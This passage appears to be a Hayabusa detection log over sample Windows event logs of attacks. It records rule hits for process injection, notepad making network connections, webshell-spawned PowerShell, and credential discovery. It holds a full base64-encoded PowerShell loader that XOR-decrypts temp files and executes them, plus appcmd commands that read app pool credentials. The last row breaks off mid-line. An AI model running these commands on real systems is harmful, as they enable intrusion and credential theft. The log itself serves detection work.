+2019-05-27 00:47:57.628 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49166 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49167 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49168 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49169 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49170 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49171 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.752 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\notepad.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3388 | Src PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100 | Tgt PID: 1240 | Tgt PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.752 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\notepad.exe | LID: 0x3e7 | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:01.864 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49172 (IEWIN7) | Dst: 10.0.2.18:888 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\notepad.exe | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 2584 | PGUID: 365ABB72-3D4A-5CEB-0000-0010FA93FD00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,../hayabusa-rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Suspicious Execution of Powershell with Base64,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.000 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3484 | PGUID: 365ABB72-3D6C-5CEB-0000-00107257FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.110 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2644 | PGUID: 365ABB72-3D6D-5CEB-0000-0010575CFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.190 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACA